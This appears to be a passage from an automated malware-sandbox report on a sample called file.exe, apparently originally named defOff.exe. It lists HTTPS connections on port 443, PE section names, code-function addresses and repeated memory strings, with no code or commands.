          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
          Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
          Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
          Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50082 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
          Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50081 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50035 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50070 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50047 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50069 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50054
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50053
          Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50056
          Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50058
          Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50057
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50059
          Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50061
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50060
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50063
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50062
          Source: unknownNetwork traffic detected: HTTP traffic on port 50068 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50045 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50065
          Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50064
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50067
          Source: unknownNetwork traffic detected: HTTP traffic on port 50056 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50066
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50069
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50068
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50070
          Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50072
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50071
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50074
          Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50073
          Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50034 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50076
          Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50075
          Source: unknownNetwork traffic detected: HTTP traffic on port 50057 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50078
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50077
          Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50079
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50081
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50080
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50083
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50082
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50085
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50084
          Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50087
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50086
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50088
          Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50079 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50017
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
          Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50032 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
          Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
          Source: unknownNetwork traffic detected: HTTP traffic on port 50078 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
          Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50029
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
          Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50023
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
          Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50025
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
          Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50026
          Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50030
          Source: unknownNetwork traffic detected: HTTP traffic on port 50067 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50039
          Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50032
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50031
          Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50033
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50036
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50035
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50038
          Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50037
          Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50041
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50040
          Source: unknownNetwork traffic detected: HTTP traffic on port 50066 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50033 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50043
          Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50042
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50045
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50044
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50047
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50046
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50049
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50048
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50050
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50052
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50051
          Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50044 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50042 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50007 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50077 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50053 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50088 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50076 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50031 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50043 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49677 -> 443
          Source: unknownHTTPS traffic detected: 13.107.246.43:443 -> 192.168.2.10:49707 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.121.10.34:443 -> 192.168.2.10:49708 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.67.160.80:443 -> 192.168.2.10:49715 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.67.160.80:443 -> 192.168.2.10:49724 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.67.160.80:443 -> 192.168.2.10:49734 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.10:49738 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.67.160.80:443 -> 192.168.2.10:49744 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.67.160.80:443 -> 192.168.2.10:49754 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.67.160.80:443 -> 192.168.2.10:49764 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.67.160.80:443 -> 192.168.2.10:49771 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.67.160.80:443 -> 192.168.2.10:49783 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 13.107.246.43:443 -> 192.168.2.10:49820 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 173.222.162.55:443 -> 192.168.2.10:49853 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.10:49849 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 23.52.182.8:443 -> 192.168.2.10:49860 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 23.52.182.8:443 -> 192.168.2.10:49868 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 13.107.246.43:443 -> 192.168.2.10:50078 version: TLS 1.2

          System Summary

          barindex
          Source: file.exeStatic PE information: section name:
          Source: file.exeStatic PE information: section name: .idata
          Source: file.exeStatic PE information: section name:
          Source: C:\Users\user\Desktop\file.exeCode function: 3_2_061F46153_2_061F4615
          Source: C:\Users\user\Desktop\file.exeCode function: 3_2_061F469C3_2_061F469C
          Source: C:\Users\user\Desktop\file.exeCode function: 3_2_061ED70E3_2_061ED70E
          Source: C:\Users\user\Desktop\file.exeCode function: 3_2_061ED7203_2_061ED720
          Source: file.exe, 00000003.00000003.1743173448.0000000005467000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1743097361.0000000005655000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1700605103.0000000005DB0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1707792246.0000000005B0C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1701050580.0000000005DAA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1703987665.0000000005DA9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1698072040.0000000005DA9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1700124790.0000000005DAD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1700246085.0000000005B03000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1688995688.000000000563D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1698614097.0000000005B03000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1688697501.0000000005588000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1696326250.0000000005B05000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1705912252.0000000005B02000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1703746574.0000000005DAC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1701912125.0000000005DAD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1743137593.00000000054BE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1743552148.000000000085B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1699389202.0000000005B0C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1691188659.0000000005B9D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1705236518.0000000005DAE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1696244859.0000000005BBB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1743173448.00000000054B7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1699572265.0000000005DAE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1706697430.0000000005DAE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1706881457.0000000005B0A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1707034543.0000000005DAC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1694746512.0000000005DA7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1695751744.0000000005DB0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1705660275.0000000005DB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1688697501.0000000005630000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1689209006.000000000569B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1693750786.0000000005B9F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1696536285.0000000005DAD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1702723848.0000000005DAC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1688995688.00000000055E2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1702081531.0000000005B0A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1704129518.0000000005B02000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1691046399.0000000005B0F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1706221891.0000000005B0E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1701521799.0000000005B06000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1707329874.0000000005DAF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1688697501.00000000055DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1701198469.0000000005B06000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1694947616.0000000005BAC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1696860256.0000000005DB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1706078049.0000000005DAD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1708787997.0000000005DAE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1696435979.0000000005BB2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1689209006.000000000563D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1695897812.0000000005B0A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1688854154.0000000005686000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1705454095.0000000005B07000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1698427946.0000000005DAF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1698249119.0000000005B0B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1701787461.0000000005B08000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1690878988.00000000057DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1704877829.0000000005DA7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1708095950.0000000005B04000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1699696632.0000000005B0B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1695055924.0000000005B02000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1694871719.0000000005B08000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1743488392.00000000054B0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1696014436.0000000005BB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1706539493.0000000005B08000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
